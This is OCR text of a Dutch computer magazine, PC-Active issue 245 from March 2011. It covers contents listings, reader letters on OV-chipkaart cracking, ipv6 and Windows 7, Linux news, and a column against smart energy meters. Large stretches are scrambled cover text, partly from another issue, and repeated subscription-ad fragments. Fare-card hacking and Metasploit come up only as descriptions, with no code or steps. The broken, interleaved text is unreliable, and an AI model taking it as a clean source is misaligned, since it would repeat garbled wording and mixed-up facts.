1 P C: GTAGG MR GRATIS SIPCLIK 3.1 T.W.V. 29 IPV4 CHT P Hoe moet u nu verder? 16 RGIMTR ndanks protesten toch doorgedrukt 12 FI 32 e wereld na het bio...
Erunt 1.1 Registry Comparison Utility 3.2 Process Monitor 2.93 RegScanner 1.82 RegFromApp 1.21 Registry Life 1.26
WWW.PC-ACTIVE.NL NR. 245
JAARGANG 23 | MAART 2011
€ 6,99
HOE VEILIG IS UW COMPUTER? TEST ZELF MET METASPLOIT 100 Cover 245 versie Daniel.indd 1
11-02-2011 11:56:18
, 3 3 € . v . p i.
LL S BACKUP4A OP CD: GR ATI
, 6 6 €
ZIE PAG. 66
€ 15, 4.6 – T.W.V.
PC-ACTIVE
NDE BMW’S RIJDE ER COMPUT maakt proefrit PC-Active
| DECEMBER 2011
90
253 JAARGANG 23
WINDOWS 8
S TIPS EN TRUC
3.0 58
G BROWSEROORLO
areversnelling Slag om hardw
26 KERSTBOOM REN ONDER DE EXPERIMENTE
| 2011
82 EN MODERNE MUIZ al blijkt handig Gebarenta
WINDOWS 8
D?
22
RA!
73
EKEN AUTEUR ONB
GROTE ROUTERTEST
n met Freenet Anoniem blijve
HELLO WONDERB
van de 2012: het jaar IPv6 waarheid voor
|
Pornofilter is dom
DBUG WACHTWOOR Al dertien jaar
68
N VEILIG 94
e getallen Met versleuteld
62
lang!
PATENTTROLLE
G | BMW CONN
BROWSEROORLO
CLOUD: REKE
N
ar Kleine ontwikkela
44 in gevaar
64
H? HIFI BLUETOOT
de huiskamer Draadloos door
ECTEDDRIVE
EXCE OFFICE 2010
40
L
grafieken Handige draai
ERTJ KLEINE LETT
ES
74
|
MODERNE MUIZE
OK klikken Nooit zomaar
OARD SOLAR KEYB ere dagen?
I 2.0 ckt STAS staatswege geha Van
54
12
78
ETS CHEAPTICKkaar tjes
Ook in donk
kope Meer dan goed
T | STASI 2.0
N | ROUTERTES
DATABASES
Alpha Five 11 Free TreeDBNotes Book Free Efficient Adress
SOFTWARE
Windows 3.60 voor Excel Draaigrafieken
SCHIJFVIRTU
ALISATIE
14 VirtualDrive Pro PowerISO 4.8 4.35 Daemon Tools Alcohol 120%
ARE VIDEOSOFTW Conver ter ke Video
.NL NR. 253 WWW.PC-ACTIVE | DEC. 2011 JAARGANG 23
€ 6,99
Freema 2.4.04 Avidemux 2.5.4 VirtualDub 1.9.11
EN VERDER 7.0.1 Mozilla Firefox
AAL VAN U? EBOOK ALLEM GOOGLE EN FAC WAT WETEN 4.6 Backup4All Lite for CD Ultimate Boot
AM 11/4/11 9:02
Exclusief aanbod!
Cover.indd 1
PCA-EW 254.indd 24
12/8/11 3:39 PM
-
U bent een fanatieke computergebruiker U bent niet bang voor techniek U wilt alle ins en outs weten van hardware en software Dan is PC-Active hét computermagazine voor u!
Profiteer nu van een extra voordelig jaarabonnement op PC-Active. Betaal slechts voor een half jaar en ontvang het tweede half jaar GRATIS. U betaalt slechts € 33,- i.p.v. € 66,-
Ga naar pc-active.nl/abonneren PCA-EW 254.indd 25
12/8/11 3:39 PM
INHOUD 20 DE 7 MOOISTE HACKS OV-chipkaart staat wijd open! Dat PC-Active onopgemerkt door het land kon toeren met gekraakte OV-chipkaarten werd vorige maand landelijk nieuws, een spoeddebat in de Tweede Kamer volgde en de kaartlezers zijn inmiddels uitverkocht! We zetten voor u de zeven beste OV-chipkaarthacks op een rijtje en laten u daarmee zien waarom de OV-chipkaart nu echt failliet is.
Hacks, apps en workshops De afgelopen tijd is er een enorme heisa geweest rond de OV-chipkaart. Oorzaak: PC-Active en onderzoeksjournalist Brenno de Winter toonden aan dat het hele systeem rond de OV-chipkaart zo lek is als een mandje. Hoewel een publieke omroep overigens nog pretendeerde dat het mede hun onderzoek was, is er maar een echte bron, namelijk een samenwerkingsverband tussen Brenno en onze redactie. Ik kan u zeggen, we liepen hier op de redactie trots rond en Brenno hebben we uitvoerig gefeliciteerd. Zo vaak gebeurt het tenslotte niet dat er een spoeddebat volgt naar aanleiding van een artikel in PC-Active. Ook in dit nummer besteden we weer aandacht aan de OV-chipkaart. Ditmaal hebben we voor u de zeven mooiste hacks geselecteerd. Niet zo spannend als hacks, maar wel bijna net zo interessant zijn apps. Geen apps op mijn smartphone of tablet zou een enorm gemis zijn. Het fenomeen apps is overigens niet relatief nieuw, want al jarenlang bestaan er bijvoorbeeld Java-applicaties voor mobiele telefoons en web apps voor de iPhone. Maar sinds de native apps kunnen we pas spreken van een succes en apps blijken ook nog eenvoudig zelf te maken. Ik wil op deze plek tevens nog wijzen op een nieuw fenomeen binnen PC-Active: we gaan zelf workshops aanbieden. Technisch redacteur Henk van de Kamer zal het spits afbijten met een workshop over ipv6. We kunnen Henk inmiddels gerust een expert op dit gebied noemen en dat zult u zeker beamen als u zijn artikelen volgt. Op www.pc-active.nl/workshops leest u meer over de workshop die in april zal plaatsvinden.
58 LEKKENDE METADATA Voorkomen is beter dan genezen Zonder dat u het weet, geeft u heel wat gevoelige informatie prijs als u een Word- of pdf-document publiceert. Hoe kunt u interessante metadata in de documenten vinden en (wat misschien nog belangrijker is) hoe voorkomt u dat u zelf gevoelige informatie verspreidt?
78 HOE VEILIG IS UW PC? Test het met metasploit In 2003 begon beveiligingsspecialist HD Moore met Metasploit, een project dat informatie verzamelde over beveiligingsfouten. Vooral bekend is het subproject Metasploit Framework, een tool waarmee penetration testers exploits kunnen uitvoeren op kwetsbare computers. We laten u zien hoe dat werkt.
IPV4 NU ECHT OP! Hoe moet u nu verder? De laatste ipv4-netwerken zijn onlangs door IANA uitgedeeld waarmee zij door de voorraad ipv4-adressen heen zijn. In dit artikel komt een aantal vragen over ipv4 en ipv6 aan bod. Uit de antwoorden blijkt dat ook ú er onherroepelijk mee te maken gaat krijgen.
6
INBOX
OV-chipkaart
10 LINUX-NIEUWS
Xfce 4.8
12 PRIVACY
Slimme energiemeters
14 ABORT, RETRY, FAIL?
Beurskrach
66 INHOUD CD
Snipclik
OP PAGINA 66 VINDT U DE INHOUDSOPGAVE VAN DE GRATIS CD-ROM BIJ PC-ACTIVE
94 HET LAB
Drobo-alternatief
97 WAMMES’ COLUMN
Angry Birds in het echt
98 COLOFON LEZERSSERVICE
HARDWARE 20 DE 7 MOOISTE CHIPKAARTHACKS
Failliet van de kaart definitief aangetoond
30 ASUS NX90
Eigenzinnige laptop voor thuis
32 UEFI
30
De wereld na het bios
ASUS NX90 Eigenzinnige laptop voor thuis Een laptop is een laptop. Zo simpel is het toch? Van die aanname blijft niets over als we de Asus NX90 uitpakken. Groot en opvallend vormgegeven. ‘Verplaatsbare desktop’ is een betere typering.
38 ARCHOS ARNOVA
internetnetwerkwekkerradio
SOFTWARE 24 TOEGANGSBEHEER
Windows-gebruikersaccounts ontleed
40 SHAREWARE
Directory Opus - Calender Magic - CollageIt
42 GRATIS REGISTERTOOLS
Beheren en beveiligen
46 EVERNOTE
Aantekeningen in de cloud
50 ANDERS E-MAILEN
Met Mutt op de commandline
54 HAAL MEER UIT...
Word: navigatie en macro’s
58 METADATA LEKKEN
Voorkomen is beter dan genezen
12 ENERGIEMETER Ondanks protesten toch doorgedrukt De slimme (lees: spionerende) energiemeter blijft de gemoederen bezighouden. Het is duidelijk dat hij ons op slinkse wijze door de strot wordt geduwd. Is het tij nog te keren?
101 inhoud blad.indd 5
62 ZELF APPS MAKEN
Voor iPhone en Android
ACHTERGROND 68 DENKWERK
Beurshandel: pc verslaat de mens
72 ENCRYPTIE
Hoe werkt het eigenlijk?
78 METASPLOIT
Hoe veilig is uw computer?
82 UW DATA UIT DE CLOUD
Data Liberation Front
86 VAN MALWARE NAAR CRIMEWARE
Sociale media makkelijk doelwit
11-02-2011 14:20:17
INBOX MAIL VAN LEZERS
HENK VAN DE K AMER (HK)
KO VAN ZEEL AND (K Z)
REAGEREN? Surf naar ons forum ‘Ik heb een probleem!’ [1] en stel uw vraag. Dit kan zonder registratie, alleen als u op de antwoorden wilt reageren is aanmelden noodzakelijk. Vragen kunt u sturen naar [email protected].
Makkelijk chipkaart uitlezen Voor het uitlezen van de OV-chipkaart heb ik een tijd geleden al een Windows-versie gemaakt [2]. Daarmee kunnen via een gui-omgeving de sleutels worden achterhaald en de kaartdata worden weergegeven. Ronald Huveneers, e-mail
Van dit aanbod hebben we dankbaar gebruik gemaakt in het vorige nummer, waarin we het nieuws bekendmaakten dat de OV-chipkaart nu definitief is gekraakt en dat het voor iedereen een fluitje van een cent is om zijn kaartgegevens aan te passen. Mede dankzij de gebruiksvriendelijke Windows-software waar het mee kan. Onze server is tijdens de avond dat het nieuws uitkwam even uit de lucht geweest, al was de reden een zeer banale. De stroomvoorziening van het rekencentrum waarin het cluster staat had te kampen met een probleem. Het resultaat is goed te zien in onderstaande grafiek. Het cluster bestaat uit een loadbalancer die momenteel de aanvragen over twee webservers verdeeld. Deze benaderen weer een MySQL-server op de achtergrond voor de data. In de pieken is mooi te zien wanneer het item in de verschillende journaals werd uitgezonden. Het debacle rondom de OV-chipkaart wordt trouwens steeds groter. Toen wij bekendmaakten dat het saldo
6
op de kaart gemakkelijk kan worden gemanipuleerd, kwam ook het nieuws dat in Amersfoort een proef was gestart waarmee de chipkaart ook in de Kiosk kan worden gebruikt om betalingen te verrichten [3]. We hebben geen idee hoeveel mensen het advies van Geenstijl [4] hebben uitgeprobeerd... Het misbruiken van de OV-chipkaart is dankzij alle vereenvoudigingen de afgelopen maanden compleet vergelijkbaar geworden met het open laten staan van de deur van uw huis als u weggaat, of de autosleutels in het contact laten zitten. Nogmaals, we raden niemand aan om crimineel te worden, maar als Trans Link Systems nog steeds met droge ogen mensen voor de rechter denkt te kunnen slepen om zo het misbruik tegen te gaan... (HK).
Het resultaat van een stroomstoring...
Locatie van bestanden Ik heb bij een kennis Windows 7 geïnstalleerd. Nu wil ik Windows ervan overtuigen dat alle data – dus documenten en alle submappen of wellicht zelfs de gehele gebruikersmap? – op de datapartitie (D: in dit geval) staat. In Windows ME was dit niet zo moeilijk, even
PC-ACTIVE | Nr. 245 – 2011
200 INBOX.indd 6
10-02-2011 14:20:41
INBOX
rechts-klikken op de map ‘Mijn documenten’ en dan de nieuwe locatie instellen. Dat is in Windows 7 kennelijk niet zo eenvoudig. Is er voor wat ik wil een aanvaarde, dat wil zeggen door Microsoft geadviseerde, methode, of moet ik de hele users-map verplaatsen naar D: en dan via een symlink (bijvoorbeeld via het programma mklink) C:\users naar D:\users laten verwijzen? Ik heb dit nog niet geprobeerd, maar het klinkt als theoretisch haalbaar? Bart, forum
De standaardinstelmogelijkheden zijn in Windows 7 iets anders geregeld dan in voorgaande versies. In Windows 7 is dit te doen via het Startmenu. Daar de gebruikersmap openen door op de gebruikersnaam te klikken. Alle daar onderliggende mappen via tabblad Locatie in eigenschappen per map, de nieuwe locatie opgeven. Omdat alle mappen apart staan onder de gebruikersnaam moet dit voor alle mappen worden herhaald die u wilt verplaatsen. Daarna de computer herstarten, waarna alles zou moeten werken. Een aantal bestanden blijft wel altijd op de C:-drive staan omdat Windows 7 ze anders niets kan terugvinden! U moet ook even opletten dat de locatie van Outlook c.q. Winmail wordt aangepast, zodat ook dit goed blijft werken (KZ).
Misverstand opgelost In het artikel ‘De allerkleinste digitizer?’ (PC-Active 244) vraagt u zich af waar de letters AM in de beschrijving voor staan. Het duurde bij mij ook even voor dat ik het wist. Het ‘USB AM’ staat voor het type connector, dus USB type A Male. M. Splint, e-mail
Al in 1907 werd de door ons tegenwoordig veelgebruikte plug al beschreven!
200 INBOX.indd 7
Toen Wammes Witkop, de auteur van het artikel, deze reactie las, was zijn respons ‘Krek. Die man heeft helemaal gelijk!’ Het artikel leverde meer reacties op waaronder een verbaasde lezer die zich afvroeg of de plug echt zo oud is als in het artikel verteld. En alhoewel Wikipedia [5] geen bron vermeldt, wordt het jaartal daar toch echt genoemd. Mocht u het jaartal desondanks niet vertrouwen, dan moet u vooral eens de gescande pagina uit een boek van 1907 lezen [6] (zie afbeelding linksonder). Soms zijn dingen heel wat ouder dan u zou denken (HK).
Internet uitzetten Onlangs zagen we in Egypte hoe gemakkelijk een regering alle kritiek de mond kan snoeren. Kunt u eens een artikel schrijven hoe de Nederlandse overheid dat zou kunnen doen? Of brengen we hen dan op ideeën? Paul Bosma, e-mail
Het uitzetten van het internet gaat in Egypte een stuk eenvoudiger dan bij ons in West-Europa. De reden is dat men in Egypte op technologische vlak op sommige punten achter loopt. Weliswaar heeft men in Egypte ook honderden internetproviders, maar anders dan hier is de meeste infrastructuur in handen van slechts vier grote partijen [7]. Omdat buitenlandse bedrijven zich aan de wet van het desbetreffende land te hebben houden – nog even afgezien van de veiligheid van medewerkers – was een simpel telefoontje van de regering voldoende om deze vier bedrijven de opdracht te geven om hun AS [8] (Autonomous System, een router waarop vele internetverbindingen binnenkomen) te herprogrammeren. Onderzoek [9] heeft geleerd dat in een paar uur tijd ruim 88 % van Egypte opeens van internet was verdwenen. Het internet is ooit gebouwd om een aanval met atoombommen te overleven. De truc is het aanleggen van een stertopologie, ofwel meerdere knooppunten allemaal onderling met elkaar te verbinden. Amsterdam –> Berlijn kan rechtstreeks, maar ook via bijvoorbeeld de route Amsterdam –> Frankfurt –> Berlijn en Amsterdam –> Hamburg –> Berlijn. Stel dat er nu iets gebeurt met de rechtstreekse verbinding, dan kan al het internetverkeer nog steeds via Hamburg of Frankfurt naar Berlijn toe en andersom. Uit de recente Wikileaks werd nog eens duidelijk waarom Nederland om drie redenen strategisch van belang [10] is voor de Amerikanen. Twee van de drie redenen betreffen de transatlantische kabels [11, 12] die bij onze kust aan land komen. Naast deze kabels is Nederland voor heel Europa een belangrijk knooppunt in het internet dankzij de AMS-IX in het wetenschapspark in Amsterdam. Anders dan in Egypte zijn in Amsterdam alleen al acht grote partijen en vele honderden kleinere partijen aanwezig die allemaal een stukje van de infrastructuur in handen hebben.
10-02-2011 14:21:30
INBOX
De strategische TAT-14-verbinding
De rootserver van de AMS-IX in het wetenschapspark in Amsterdam
Mocht Rutte dus gekke dingen in zijn hoofd halen en het Nederlandse internet willen afsluiten, dan heeft hij het heel wat lastiger dan Hosni Mubarak! Binnenkort komen we in PC-Active uitgebreid terug op dit scenario (HK).
Panda en ipv6 Als fan van PC-Active heb ik na het lezen van de februari 2010-review [13] besloten om het aangeraden Panda Internet Security 2010 aan te schaffen voor alle drie pc’s in mijn thuisnetwerk. Gelukkig zit de redactie van PC-Active bovenop het nieuws rondom het einde van ipv4 en de invoering van ipv6. Ik was dan ook behoorlijk verbaasd toen eind vorig jaar bleek dat ik op mijn stageadres ineens de beschikking kreeg over ipv6, maar dat mijn Windows 7-laptop in alle toonaarden weigerde om ipv6-only websites te bezoeken! En dat terwijl ik thuis over Teredo al flink wat ipv6-verbindingen had gehad voor Bittorrent-downloads, zonder problemen. Na diverse pogingen om via verschillende browsers, netstat, Wireshark, Portproxy en uiteindelijk de task manager het probleem op te lossen, kwam ik tot de volgende conclusie: onderdeel van Panda Internet Security is een proxy (genaamd WebProxy.exe, in de programmamap van Panda) die http-verkeer omleidt zodat het gescand kan worden op virussen en malware. Voor elke http-
8
verbinding zet deze proxy een eigen verbinding naar buiten op, en scant de data voor narigheden. Ik vermoed dat deze proxy geen uitgaande ipv6-verbindingen ondersteunt en dat dit de oorzaak is van mijn probleem. Helaas heb ik dit onderdeel niet kunnen uitschakelen, anders dan door Panda zelf geheel uit te schakelen. Het uitzetten van de webscans in de configuratie van Panda sluit het proces namelijk niet af. Ook na het uitzetten van de hele securitysuite moet ik regelmatig het proces WebProxy.exe handmatig afschieten omdat het op de achtergrond actief blijft. Ik heb deze kwestie in november al op het supportforum van Panda kenbaar gemaakt, en afgelopen maand heb ik daar eindelijk het antwoord [14] gekregen: ‘dit is een ons bekend probleem’. Waarschijnlijk heeft Panda Internet Security 2011 hetzelfde probleem. Enkele gesprekken met de sales- en supportlijn van Panda in Nederland later en weer diverse mails naar de helpdesk heb ik nog geen antwoord van Panda Nederland over het hoe en waarom van dit probleem, en of ze dit (voor mij en de rest van de kopers) gaan oplossen. Het lijkt er op dat ik voor mijn beveiliging een ander pakket moet zoeken, maar daar wringt hem nou juist de schoen: vaak is alleen te vinden of de firewall ipv6 ondersteunt, maar niet of de andere onderdelen hier goed mee overweg kunnen. Zou het een idee zijn om dit als testcriterium mee te nemen in de tests van PC-Active? Ik denk dat veel lezers die aan de slag gaan met ipv6 hier mee geholpen kunnen zijn, en mochten jullie binnenkort weer een test van securitysuites uitvoeren, dan kan ik weer 100% op het oordeel van PC-Active vertrouwen! Ik weet in ieder geval alvast het antwoord op de zeurvragen van Panda over het verlengen van mijn licentie: dat ga ik dus niet doen! Matthias van der Heide, e-mail
Dit mailtje kwam binnen op de dag dat de bron van ipv4-adressen definitief is opgedroogd [15]. De verwachting is dat RIPE nog voldoende voorraad heeft tot het einde van dit jaar. Daarna zullen providers ook nog wat voorraad hebben, maar om daar op te vertrouwen gaat wel heel erg ver. Ofwel, producten die nu wereldwijd worden verkocht, zouden eigenlijk al gewoon met ipv6 overweg moeten kunnen. Helaas is dat voor bijna niets het geval. De PC-Active-redactie weet inderdaad van het opraken en het afgelopen jaar hebben we dankzij de native ipv6-verbinding van Xs4all een en ander kunnen testen, maar het resultaat mag duidelijk zijn voor vaste lezers. Inderdaad hebben we bijna nergens met enthousiasme een stukje over ipv6 bij een productbespreking kunnen toevoegen. De suggestie om het mee te nemen in een nieuwe test is absoluut een goede. Maar veel van onze freelanceauteurs hebben geen native ipv6. Ook wij zijn dus met handen en voeten gebonden door de lakse houding van providers en fabrikanten van routers.
PC-ACTIVE | Nr. 245 – 2011
200 INBOX.indd 8
10-02-2011 14:21:56
INBOX
Voor u als lezer heeft dat één voordeel, wij krijgen met dezelfde problemen te maken als u. Dat er problemen gaan komen, is wel duidelijk, alleen waar het mis zal gaan nog niet. Het zal ook afhangen van wat providers gaan doen. Als zij versneld native ipv6 en geschikte routers gaan inzetten, zullen die klanten veel minder problemen ondervinden als allerlei diensten ook via ipv6 toegankelijk worden. Providers die gaan investeren in walgelijke trucs – te denken valt aan een super-NAT bij de provider – konden wel eens snel failliet gaan omdat klanten diensten als Bittorrent, ftp, vpn en meer van dit soort diensten niet of zeer lastig kunnen gebruiken. NAT in uw router thuis heeft ervoor gezorgd dat we nu pas door de ipv4-voorraad heen zijn geraakt, maar iedereen kent wel een voorbeeld waarbij deze vertaalslag ook problemen heeft opgeleverd. Thuis kunt u daar nog het nodige zelf doen, maar aan die super-NAT bij uw provider? Wij raden al onze lezers aan om nu massaal naar uw provider te gaan mailen en te vragen wanneer u native ipv6 bij hen kunt afnemen. Laat u daarbij niet afschepen met een standaardantwoord, maar vraag minimaal om een gedetailleerde roadmap (HK)
Xfce 4.8 Na twee jaar ontwikkeling is er een nieuwe versie uit van de lichtgewicht desktopomgeving Xfce. Xfce 4.8 is heel wat verbeterd onder de motorkap: zo zijn de verouderde componenten ThunarVFS en HAL vervangen door de nieuwere componenten GIO, udev, ConsoleKit en PolicyKit, waardoor Xfce mee mee kan met zijn grote broers Gnome en KDE. Deze verbeteringen maken heel wat nieuwe features mogelijk. Zo kunt u nu in netwerkshares navigeren met heel wat protocols, zoals Windows-shares, ftp, WebDav en sftp. En wie meerdere bestandsbewerkingen zoals kopiëren en verplaatsen tegelijk uitvoert, krijgt de voortgangsindicators nu in één venster te zien. Bij verwijderbare schijven toont de bestandsbeheerder Thunar nu een eject-knopje. En dankzij ondersteuning van RandR 1.2 detecteert Xfce 4.8 automatisch meerdere schermen en laat het u toe om eenvoudig de resolutie te kiezen en uw schermen te roteren, te klonen en/of naast elkaar te positioneren. Ook het uiterlijk is wat gewijzigd. Het Xfce-paneel is helemaal herschreven en u kan het nu slepen en tegen de schermranden plakken. De lengte van het paneel kan ingesteld worden als een percentage van de schermgrootte, en de achtergrond van het paneel kan nu ook transparant zijn. Een ‘item editor’ laat nu toe om snel items in het paneel te wijzigen, verplaatsen of te verwijderen. Menu-items kunt u nu verslepen vanuit het applicatiemenu, de applicatievinder of Thunar naar het paneel om een launcher te creëren. En er is nu ook een menu-item waarmee u directory’s rechtstreeks vanuit het paneel kunt openen. WWW.XFCE.ORG
10
PC-ACTIVE | Nr. 245 – 2011
204 Linux nieuws.indd 10
10-02-2011 14:37:08
E-BOOKS
| HARDWARE
Distributies Op kerstavond kwam Linux Mint Debian Edition (LMDE) 201012 uit, een versie van Linux Mint die niet op Ubuntu gebaseerd is maar op Debian. Het installatieprogramma ondersteunt nu meerdere harde schijven, installatie van de bootloader GRUB op een afzonderlijke partitie, en het bestandssysteem Btrfs. Linux Mint Debian Edition biedt ook Ubuntu’s betere lettertypes. Verder is er ook betere hardwaresupport en heeft heel wat software natuurlijk een update gekregen. LMDE ziet er hetzelfde uit als de normale editie van Linux Mint, inclusief een Gnome-desktop, en biedt dezelfde functionaliteit aan, maar bestaat uit pakketten van Debian Testing in plaats van Ubuntu. De Linux-distributie is beschikbaar in 32- en 64-bit versies als live-dvd. Rond dezelfde periode kwam Mandriva 2010.2 uit, een kleine update van Mandriva 2010.1. Het verschil zit vooral in security-updates en andere kleine updates van de aanwezige software. De distributie bevat Gnome 2.30.2, KDE 4.4.3, Firefox 3.6.13, Thunderbird 3.0.11 en OpenOffice.org 3.2.0. Onder de motorkap draait Linux-kernel 2.6.33.7. De Franse Linux-distributie komt in verschillende edities: de gratis te downloaden Free en One edities, de € 49 kostende Powerpack-editie met propriëtaire drivers en applicaties, en de € 49,90 kostende Flash-editie op een usb-stick. In januari kwam dan Calculate Linux 11.0 uit, een Gentoo-gebaseerde Linuxdistributie voor desktops en servers. Hiervan bestaan verschillende edities: Calculate Linux Desktop met KDE (CLD), Gnome (CLDG) of Xfce (CLDX), Calculate Linux Scratch (CLS), Calculate Directory Server (CDS) en Calculate Scratch Server (CSS). Die laatste is een minimalistische distributie voor servers. Calculate Linux 11.0 voegt een betere ondersteuning voor netbooks en Canon-printers toe en gebruikt KMS (Kernel Mode Setting) voor videokaarten van Intel. LINUXMINT.COM/ WWW.MANDRIVA.COM/EN/ WWW.CALCULATE-LINUX.ORG/EN
Kantoorpakketten Het open-sourcekantoorpakket KOffice is uitgekomen met versie 2.3, de laatste versie voordat het pakket hernoemd wordt naar Calligra Suite. Het tekenprogramma Krita is volgens de ontwikkelaars nu eindelijk klaar voor gebruik door professionele artiesten. Het presentatieprogramma KPresenter is uitgebreid met nieuwe animaties en een nieuwe slide sorter view. Inlezen van documenten in het OpenDocument Format (ODF) is nu beter ondersteund, evenals inlezen van bestanden in Microsoft Office-formaat (doc, xls, ppt, docx, xlsx, pptx). De ontwikkelaars van LibreOffice, de afsplitsing van het open-sourcekantoorpakket Openoffice.org, hebben hun eerste release uitgebracht, versie 3.3. Het programma biedt alle functies van Openoffice.org 3.3, dat slechts enkele dagen na LibreOffice 3.3 eveneens uitkwam: het inbedden van standaard pdflettertypes in pdf-documenten, nieuwe opties voor CSV-import in Calc, hiërarchische assenlabels voor Charts, een eenvoudiger interface om te printen, enzovoorts. Daarnaast biedt de release ook een aantal functies die specifiek voor LibreOffice ontwikkeld zijn, zoals de mogelijkheid om SVG-bestanden te importeren, importfilters voor Microsoft Works en Lotus Word Pro en ondersteuning voor het bestandsformaat ooxml. WWW.CALLIGRA-SUITE.ORG WWW.LIBREOFFICE.ORG/ WWW.OPENOFFICE.ORG/
PC-ACTIVE | Nr. 245 – 2011
204 Linux nieuws.indd 11
11
10-02-2011 14:37:55
PRIVACY
TEKST : HENK VAN DE K AMER
SLIM METEN = SLINKS WETEN In deze column hebben we het al eens over de slimme – maar in de praktijk zeer domme – energiemeter gehad. De bovenstaande kop was de titel van de campagne die Vrijbit in het voorjaar van 2009 tegen de invoering voerde. Toenmalig minister Van der Hoeven zag zoveel voordelen dat zij per wet wilde regelen dat iedereen die zou weigeren een economisch delict zou begaan dat strafbaar was met onder andere maximaal een half jaar gevangenisstraf. Dat was de Eerste Kamer gelukkig veel te gortig en het voorstel werd teruggestuurd ter reparatie aan de Tweede Kamer. Daar werd duidelijk dat door het vervallen van de verplichting de business-case van 1,3 miljard besparing naar 770 miljoen euro kelderde. En als 20 % van de huishoudens deze vorm van spionage weigert, draait het geheel zelfs verlies. Energiebedrijven is er dan ook alles aan gelegen om u die slimme meter door de strot te duwen, goedschiks, dan wel kwaadschiks. Ondertussen zijn we bijna twee jaar verder en is dankzij de huidige impasse op slinkse wijze versneld de slimme meter ingevoerd. Vaak met het argument dat het om een domme meter zou gaan, omkopen met vermeende voordelen of zelfs regelrechte afpersing dat anders de boel wordt afgesloten. Want minister van der Hoeven gaf in het NOS Journaal een paar uur na haar verlies het volgende interview dat het belang van invoering genadeloos blootlegde: Verslaggever: Het kabinet gaat er dus flink reclame voor maken, maar verplicht wordt hij dus niet, hoewel sommige mensen nog steeds geen keuze hebben. Als ik een nieuwbouwhuis koop, dan zit die meter daar al in, daar kan ik niets meer tegen doen. Mw. Van der Hoeven: Tja, dan wordt het lastig, want die zit er al in. Verslaggever: Dan heb ik pech gehad? Mw. Van der Hoeven: Dan u hebt u pech gehad. Ondertussen hebben we een nieuwe minister, maar ook Verhagen probeert de slimme meter in te voeren. Zo is de vrijwilligheid vertaald naar dat wij ‘of de slimme meters kunnen weigeren of deze administratief kunnen laten uitzetten’. Zelf zit ik in de situatie dat mijn 36 jaar oude, zeer slimme Ferrarismeter is
12
afgekeurd en vervangen moet worden. Men beweert dat het hier om een digitale, domme meter gaat, maar ingaan op mijn vragen naar een elektronisch schema, waarmee je kunt zien welke onderdelen aanwezig zijn en dus kunt uitzoeken of daar chips tussenzitten die bijvoorbeeld via gprs of via de aanvoerleidingen informatie kunnen verzenden, wil men niet ingaan. Ook wil men niet aangeven hoe men de wettelijk verplichte saldering – het verrekenen van afgenomen en zelf geproduceerde zonnestroom – zonder kosten voor mij gaat doorvoeren. Iets wat de huidige meter doet door gewoon achteruit te draaien. Geen haan die daar naar kraait zodat ik ook niet afhankelijk ben van een energiebedrijf dat dit soort initiatieven gewoon, ik zal me diplomatiek uitdrukken, te lastig vindt. Vrijbit heeft over die maffe ‘of-of’-constructie – die in de praktijk uiteraard naar dat laatste vertaald zal worden: u krijgt toch verplicht een slimme meter en mag hopen dat men deze niet uitleest – vragen gesteld en het antwoord van Verhagen (zie link) toont wederom aan dat onze ministers niets van techniek snappen. De minister stelt voor – niet per wet, maar via een maatregel van bestuur – om in de meter een logboek bij te houden waarin staat wanneer het is uitgelezen. Hoe dom kun je zijn? Het eerste wat een inbreker in een computersysteem doet, is zorgen dat niets van zijn/ haar daden wordt gelogd. Als ik dus niet de broncode van de software in de meter heb en dus ook niet kan controleren of daar de originele code draait, zegt zo’n logboek helemaal niets. Ook het voorstel dat we met de Wet Bescherming Persoonsgegevens kunnen controleren wat er wordt vastgelegd werkt niet. De afgelopen paar jaar heb ik zeker dertig verzoeken – ook naar onze overheid – gedaan en tot op heden ondanks aandringen nooit antwoord gekregen. Klachten bij het CBP leiden ook tot niets omdat men daar zwaar onderbezet is. Als we ergens een economisch delict van zouden moeten maken, is het wel deze weigerachtige houding. Ik hoop dat de Eerste Kamer deze column leest en alsnog gaat eisen dat altijd de (terug)plaatsing van een analoge meter mogelijk blijft. www.eerstekamer.nl/behandeling/20110114/verslag_schriftelijk_ overleg_van_2/f=/vim4armb8fz0.pdf
PC-ACTIVE | Nr. 245 – 2011
Beveiliging.indd 12
10-02-2011 15:00:08
U
NU WORD EE! ABONN
N WORD
! ONNEE
EE! ABONN
RD NU O W ! NU ONNEE WORD B A ! EE ABONN
EE!
ABONN
WORD NU ABONNEE! WORD
NU
WORD
NU
NU WORD U N NNEE! O WORD B A EE! ABONN
EE!
ABONN
RD NU ABONNEE! O NU W WORD ! NU E E D R N U O N N ABO ORD NNEE! U W O W ! N B E A E D R N U ! N N WO ONNEE WORD ! ABO B E A E N U ! N N E RD NE U ABO ORD N U WO NEE! ABON W N D R U ! O N N ONNEE WORD NU W NNEE! ABO B A D R U ! O N E W E BO WORD ABONN EE! A N U ! N N E O E D B A OR NN NU W NNEE! ABO D R U O ABO ORD N U W W ! N E E D R N U ! N N WO ONNEE WORD ! ABO B E A E N U ! N N E E ABO WORD RD NU ABONN O U W ! N E E D ! OR NN NU ONNEE WORD NU W NNEE! ABO B A D R U ! O N E O W WORD BONNE E! AB A E N U ! N N E O E D R N U AB ORD N U WO NEE! ABON W N D R U O N N WORD NU W NNEE! ABO O WORD AB
B
EE!
ABONN
1 JAAR
NU WORD EE! ABONN
(26X)
WORD U N ON WORD E! AB E N N O AB WOR U N D WOR EE! ABONN
VOOR MAAR
39,50
ABONN
NU WORD E! BONNE A ! E E ABONN
c Haal meer uit uw p ! met Computer Idee eken ● Verschijnt elke 2 w n ● Tips & achtergronde software ● Tests van hard- en ● Koopadviezen ps ● Duidelijke worksho
NU WORD EE! ABONN
NNEE!
EE
ABONN
